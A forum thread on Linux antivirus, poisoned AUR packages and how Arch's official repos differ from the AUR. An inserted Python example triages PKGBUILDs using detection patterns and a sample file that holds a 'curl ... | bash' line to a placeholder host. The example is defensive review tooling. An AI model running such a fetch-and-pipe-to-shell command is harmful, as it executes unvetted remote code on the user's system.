also: antivirus detection, you guys have antivirus? I just install things from the official repository
Well, recently there have been attacks on Arch-based distros via poisoned AUR packages.
Isn’t the Arch repo a little bit faster to accept packages? From what I understood, the point was to make it easier to maintain a package, so you have the most up-to-date software version. Not sure if this was the problem or anything else, but I have doubts that Debian repositories could be poisoned like this.
The Arch repos are completely different from the AUR. The Arch repos are officially maintained and tested. The AUR is where anyone can go upload a little pkgbuild script to make building and installing an arbitrary package as easy as possible.
Arch’s package manager (pacman) does not work with the AUR. The AUR is basically a glorified pastebin. It’s a convenience for people who know what they’re doing, but you should not go downloading and executing files at random from there. Arch explicitly warns against doing this, and deliberately does not ship with any easy way to do this.
Just in case you didn’t circle back, the other commenter is correct. Just like Debian repositories, Arch repositories also haven’t been poisoned like this. The AUR has recently, but that’s the equivalent of adding 3rd-party repos on Debian; the AUR is basically just a meta collection of those unofficial user repos. Arch documentation even warns against blindly installing from the AUR, and says to read the PKGBUILD first, since it’s basically the same thing as copying and pasting a curl command from a GitHub repo’s readme.
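The "read the PKGBUILD first" advice above, as an added example that is not part of the thread: a static triage pass that points a reviewer at the lines to read most closely before running makepkg. The sample PKGBUILD, its hosts and the check list are constructed for illustration; the script only reads the file as text and never sources or executes it.

```python
import re

# Constructed sample PKGBUILD (not a real AUR package; hosts are placeholders).
SAMPLE_PKGBUILD = """\
pkgname=example-tool-bin
pkgver=1.2.3
source=("https://example.org/example-tool-$pkgver.tar.gz"
        "helper.sh::https://example.net/raw/helper.sh")
sha256sums=('SKIP'
            'SKIP')
install=example-tool.install
package() {
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
  curl -s https://example.net/setup.sh | bash
}
"""

# (label, pattern) pairs chosen for this example; each marks a line to read, not a verdict.
CHECKS = [
    ("checksum-skipped", re.compile(r"\bSKIP\b")),          # source not pinned to a hash
    ("install-script", re.compile(r"^\s*install=")),        # .install hooks run as root under pacman
    ("fetch-in-build", re.compile(r"\b(?:curl|wget)\b")),   # download outside the source= array
    ("pipe-to-shell", re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("encoded-payload", re.compile(r"base64\s+(?:-d|--decode)|\beval\b")),
]

def triage(pkgbuild_text):
    """Return (line_number, label, line) for every line matching a check."""
    findings = []
    for number, line in enumerate(pkgbuild_text.splitlines(), start=1):
        for label, pattern in CHECKS:
            if pattern.search(line):
                findings.append((number, label, line.strip()))
    return findings

def source_hosts(pkgbuild_text):
    """Every host the script references, so each can be compared with upstream."""
    return sorted(set(re.findall(r"https?://([^/\s'\"]+)", pkgbuild_text)))

if __name__ == "__main__":
    print("hosts:", ", ".join(source_hosts(SAMPLE_PKGBUILD)))
    for number, label, line in triage(SAMPLE_PKGBUILD):
        print(f"{number:>3}  {label:<17} {line}")
```

An empty result only means none of these patterns matched; the PKGBUILD, any `.install` file and the listed hosts still need to be read and compared against the upstream project.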
The AUR is not an official repository by the distro, and malware in user repos is nothing new.
I’ve been using Linux for more than 25 years and never had an antivirus. I’m also trying to just keep to official repos. From what I’ve seen over the years, it’s not viruses or malware that are the most dangerous on Linux, but vulnerabilities found in some software, which usually only require you to update your system.
Maybe I’d be more careful if I was installing obscure packages from weird places, but I’m about as conservative as Debian when it comes to new software and bleeding edge, so usually the stuff that I install has been tried and tried again.